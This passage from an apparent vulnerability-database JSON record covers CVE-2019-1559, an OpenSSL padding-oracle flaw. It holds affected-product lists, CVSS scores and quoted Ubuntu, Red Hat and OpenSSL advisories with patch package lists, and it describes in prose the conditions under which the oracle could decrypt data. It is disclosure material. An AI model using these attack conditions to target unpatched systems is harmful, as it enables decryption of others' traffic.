"cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:business_intelligence:11.1.1.9.0:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:secure_global_desktop:5.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "8.0.15", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "5.7.25", "versionStartIncluding": "5.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jd_edwards_world_security:a9.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jd_edwards_world_security:a9.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "5.6.43", "versionStartIncluding": "5.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.2.0.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:services_tools_bundle:19.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_performance_intelligence_center:10.4.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:8.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "8.0.14", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.0.8", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jd_edwards_world_security:a9.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_router:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_router:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_router:8.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:endeca_server:7.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql_workbench:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "8.0.16", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_router:8.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_router:8.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_session_border_controller:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_unified_session_manager:7.3.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_unified_session_manager:8.2.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.0.20", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.1.8", "versionStartIncluding": "8.1.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "9.0.2", "versionStartIncluding": "9.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "7.1.15", "versionStartIncluding": "7.1.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "6.8.1", "versionStartIncluding": "6.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "8.8.1", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*", "cpe_name": [], "versionEndExcluding": "6.17.0", "versionStartIncluding": "6.9.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*", "cpe_name": [], "versionEndExcluding": "8.15.1", "versionStartIncluding": "8.9.0", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2019-1559" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Robert Merget and Nimrod Aviram, with additional investigation by Steven Collison and Andrew Hourselt,Red Hat,Slackware Security Team,Juraj Somorovsky", "sources": [ { "db": "CNNVD", "id": "CNNVD-201902-956" } ], "trust": 0.6 }, "cve": "CVE-2019-1559", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.3, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2019-1559", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-147651", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, { "attackComplexity": "High", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.9, "baseSeverity": "Medium", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2019-1559", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2019-1559", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201902-956", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-147651", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2019-1559", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-147651" }, { "db": "VULMON", "id": "CVE-2019-1559" }, { "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "db": "CNNVD", "id": "CNNVD-201902-956" }, { "db": "NVD", "id": "CVE-2019-1559" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "If an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MAC. If the application then behaves differently based on that in a way that is detectable to the remote peer, then this amounts to a padding oracle that could be used to decrypt data. In order for this to be exploitable \"non-stitched\" ciphersuites must be in use. Stitched ciphersuites are optimised implementations of certain commonly used ciphersuites. Also the application must call SSL_shutdown() twice even if a protocol error has occurred (applications should not do this but some do anyway). Fixed in OpenSSL 1.0.2r (Affected 1.0.2-1.0.2q). OpenSSL Contains an information disclosure vulnerability.Information may be obtained. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. A vulnerability in OpenSSL could allow an unauthenticated, remote malicious user to access sensitive information on a targeted system. An attacker who is able to perform man-in-the-middle attacks could exploit the vulnerability by persuading a user to access a link that submits malicious input to the affected software. A successful exploit could allow the malicious user to intercept and modify the browser requests and then observe the server behavior in order to conduct a padding oracle attack and decrypt sensitive information. The appliance is available\nto download as an OVA file from the Customer Portal. ==========================================================================\nUbuntu Security Notice USN-4376-2\nJuly 09, 2020\n\nopenssl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This update provides\nthe corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. \n\nOriginal advisory details:\n\n Cesar Pereida Garc\\xeda, Sohaib ul Hassan, Nicola Tuveri, Iaroslav Gridin,\n Alejandro Cabrera Aldaya, and Billy Brumley discovered that OpenSSL\n incorrectly handled ECDSA signatures. An attacker could possibly use this\n issue to perform a timing side-channel attack and recover private ECDSA\n keys. A remote attacker could possibly use this issue to decrypt\n data. (CVE-2019-1559)\n\n Bernd Edlinger discovered that OpenSSL incorrectly handled certain\n decryption functions. (CVE-2019-1563)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n libssl1.0.0 1.0.1f-1ubuntu2.27+esm1\n\nUbuntu 12.04 ESM:\n libssl1.0.0 1.0.1-4ubuntu5.44\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nTomcat Servlet container, JBoss HTTP Connector (mod_cluster), the\nPicketLink Vault extension for Apache Tomcat, and the Tomcat Native\nlibrary. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: openssl security and bug fix update\nAdvisory ID: RHSA-2019:2304-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:2304\nIssue date: 2019-08-06\nCVE Names: CVE-2018-0734 CVE-2019-1559\n====================================================================\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* openssl: 0-byte record padding oracle (CVE-2019-1559)\n\n* openssl: timing side channel attack in the DSA signature algorithm\n(CVE-2018-0734)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.7 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm\n1649568 - openssl: microarchitectural and timing side channel padding oracle attack against RSA\n1683804 - CVE-2019-1559 openssl: 0-byte record padding oracle\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.2k-19.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-19.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-libs-1.0.2k-19.el7.i686.rpm\nopenssl-libs-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-devel-1.0.2k-19.el7.i686.rpm\nopenssl-devel-1.0.2k-19.el7.x86_64.rpm\nopenssl-perl-1.0.2k-19.el7.x86_64.rpm\nopenssl-static-1.0.2k-19.el7.i686.rpm\nopenssl-static-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.2k-19.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-19.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-libs-1.0.2k-19.el7.i686.rpm\nopenssl-libs-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-devel-1.0.2k-19.el7.i686.rpm\nopenssl-devel-1.0.2k-19.el7.x86_64.rpm\nopenssl-perl-1.0.2k-19.el7.x86_64.rpm\nopenssl-static-1.0.2k-19.el7.i686.rpm\nopenssl-static-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.2k-19.el7.src.rpm\n\nppc64:\nopenssl-1.0.2k-19.el7.ppc64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.ppc.rpm\nopenssl-debuginfo-1.0.2k-19.el7.ppc64.rpm\nopenssl-devel-1.0.2k-19.el7.ppc.rpm\nopenssl-devel-1.0.2k-19.el7.ppc64.rpm\nopenssl-libs-1.0.2k-19.el7.ppc.rpm\nopenssl-libs-1.0.2k-19.el7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.2k-19.el7.ppc64le.rpm\nopenssl-debuginfo-1.0.2k-19.el7.ppc64le.rpm\nopenssl-devel-1.0.2k-19.el7.ppc64le.rpm\nopenssl-libs-1.0.2k-19.el7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.2k-19.el7.s390x.rpm\nopenssl-debuginfo-1.0.2k-19.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-19.el7.s390x.rpm\nopenssl-devel-1.0.2k-19.el7.s390.rpm\nopenssl-devel-1.0.2k-19.el7.s390x.rpm\nopenssl-libs-1.0.2k-19.el7.s390.rpm\nopenssl-libs-1.0.2k-19.el7.s390x.rpm\n\nx86_64:\nopenssl-1.0.2k-19.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-devel-1.0.2k-19.el7.i686.rpm\nopenssl-devel-1.0.2k-19.el7.x86_64.rpm\nopenssl-libs-1.0.2k-19.el7.i686.rpm\nopenssl-libs-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.2k-19.el7.ppc.rpm\nopenssl-debuginfo-1.0.2k-19.el7.ppc64.rpm\nopenssl-perl-1.0.2k-19.el7.ppc64.rpm\nopenssl-static-1.0.2k-19.el7.ppc.rpm\nopenssl-static-1.0.2k-19.el7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.2k-19.el7.ppc64le.rpm\nopenssl-perl-1.0.2k-19.el7.ppc64le.rpm\nopenssl-static-1.0.2k-19.el7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.2k-19.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-19.el7.s390x.rpm\nopenssl-perl-1.0.2k-19.el7.s390x.rpm\nopenssl-static-1.0.2k-19.el7.s390.rpm\nopenssl-static-1.0.2k-19.el7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-perl-1.0.2k-19.el7.x86_64.rpm\nopenssl-static-1.0.2k-19.el7.i686.rpm\nopenssl-static-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.2k-19.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-19.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-devel-1.0.2k-19.el7.i686.rpm\nopenssl-devel-1.0.2k-19.el7.x86_64.rpm\nopenssl-libs-1.0.2k-19.el7.i686.rpm\nopenssl-libs-1.0.2k-19.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-19.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-19.el7.x86_64.rpm\nopenssl-perl-1.0.2k-19.el7.x86_64.rpm\nopenssl-static-1.0.2k-19.el7.i686.rpm\nopenssl-static-1.0.2k-19.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-0734\nhttps://access.redhat.com/security/cve/CVE-2019-1559\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXUl3otzjgjWX9erEAQgZQQ//XNcjRJGLVmjAzbVGiwxEqfFUvDVNiu97\nfW0vLXuV9TnQTveOVqOAWmmMv2iShkVIRPDvzlOfUsYrrDEYHKr0N38R/fhDEZsM\nWQrJh54WK9IjEGNevLTCePKMhVuII1WnHrLDwZ6hxYGdcap/sJrf+N428b5LvHbM\nB39vWl3vqJYXoiI5dmIYL8ko2SfLms5Cg+dR0hLrNohf9gK2La+jhWb/j2xw6X6q\n/LXw5+hi/G+USbnNFfjt9G0fNjMMZRX2bukUvY6UWJRYTOXpIUOFqqp5w9zgM7tZ\nuX7TMTC9xe6te4mBCAFDdt+kYYLYSHfSkFlFq+S7V0MY8DmnIzqBJE4lJIDTVp9F\nJbrMIPs9G5jdnzPUKZw/gH9WLgka8Q8AYI+KA2xSxFX9VZ20Z+EDDC9/4uwj3i0A\ngLeIB68OwD70jn4sjuQqizr7TCviQhTUoKVd/mTBAxSEFZLcE8Sy/BEYxLPm81z0\nveL16l6pmfg9uLac4V576ImfYNWlBEnJspA5E9K5CqQRPuZpCQFov7/D17Qm8v/x\nIcVKUaXiGquBwzHmIsD5lTCpl7CrGoU1PfNJ6Y/4xrVFOh1DLA4y6nnfysyO9eZx\nzBfuYS2VmfIq/tp1CjagI/DmJC4ezXeE4Phq9jm0EBASXtnLzVmc5j7kkqWjCcfm\nBtpJTAdr1kE=7kKR\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe following packages have been upgraded to a later upstream version:\nimgbased (1.1.9), ovirt-node-ng (4.3.5), redhat-release-virtualization-host\n(4.3.5), redhat-virtualization-host (4.3.5). Bugs fixed (https://bugzilla.redhat.com/):\n\n1640820 - CVE-2018-16838 sssd: improper implementation of GPOs due to too restrictive permissions\n1658366 - CVE-2018-16881 rsyslog: imptcp: integer overflow when Octet-Counted TCP Framing is enabled\n1683804 - CVE-2019-1559 openssl: 0-byte record padding oracle\n1687920 - RHVH fails to reinstall if required size is exceeding the available disk space due to anaconda bug\n1694065 - CVE-2019-0161 edk2: stack overflow in XHCI causing denial of service\n1702223 - Rebase RHV-H on RHEL 7.7\n1709829 - CVE-2019-10139 cockpit-ovirt: admin and appliance passwords saved in plain text variable file during HE deployment\n1718388 - CVE-2019-10160 python: regression of CVE-2019-9636 due to functional fix to allow port numbers in netloc\n1720156 - RHVH 4.3.4 version info is incorrect in plymouth and \"/etc/os-release\"\n1720160 - RHVH 4.3.4: Incorrect info in /etc/system-release-cpe\n1720310 - RHV-H post-installation scripts failing, due to existing tags\n1720434 - RHVH 7.7 brand is wrong in Anaconda GUI. \n1720435 - Failed to install RHVH 7.7\n1720436 - RHVH 7.7 should based on RHEL 7.7 server but not workstation. \n1724044 - Failed dependencies occur during install systemtap package. \n1726534 - dhclient fails to load libdns-export.so.1102 after upgrade if the user installed library is not persisted on the new layer\n1727007 - Update RHVH 7.7 branding with new Red Hat logo\n1727859 - Failed to boot after upgrading a host with a custom kernel\n1728998 - \"nodectl info\" displays error after RHVH installation\n1729023 - The error message is inappropriate when run `imgbase layout --init` on current layout\n\n6. \n\nThis issue was discovered by Juraj Somorovsky, Robert Merget and Nimrod Aviram,\nwith additional investigation by Steven Collison and Andrew Hourselt. It was\nreported to OpenSSL on 10th December 2018. \n\nNote: Advisory updated to make it clearer that AEAD ciphersuites are not impacted. \n\nNote\n====\n\nOpenSSL 1.0.2 and 1.1.0 are currently only receiving security updates. Support\nfor 1.0.2 will end on 31st December 2019. Support for 1.1.0 will end on 11th\nSeptember 2019. Users of these versions should upgrade to OpenSSL 1.1.1. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20190226.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2019-1559" }, { "db": "JVNDB", "id": "JVNDB-2019-002098" }, { "db": "VULHUB", "id": "VHN-147651" }, { "db": "VULMON", "id": "CVE-2019-1559" }, { "db": "PACKETSTORM", "id": "154009" }, { "db": "PACKETSTORM", "id": "158377" }, { "db": "PACKETSTORM", "id": "155413" }, { "db": "PACKETSTORM", "id": "151885" }, { "db": "PACKETSTORM", "id": "155415" }, { "db": "PACKETSTORM", "id": "153932" }, { "db": "PACKETSTORM", "id": "154008" }, { "db": "PACKETSTORM", "id": "169635" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-1559", "trust": 3.4 }, { "db": "TENABLE", "id": "TNS-2019-03", "trust": 1.8 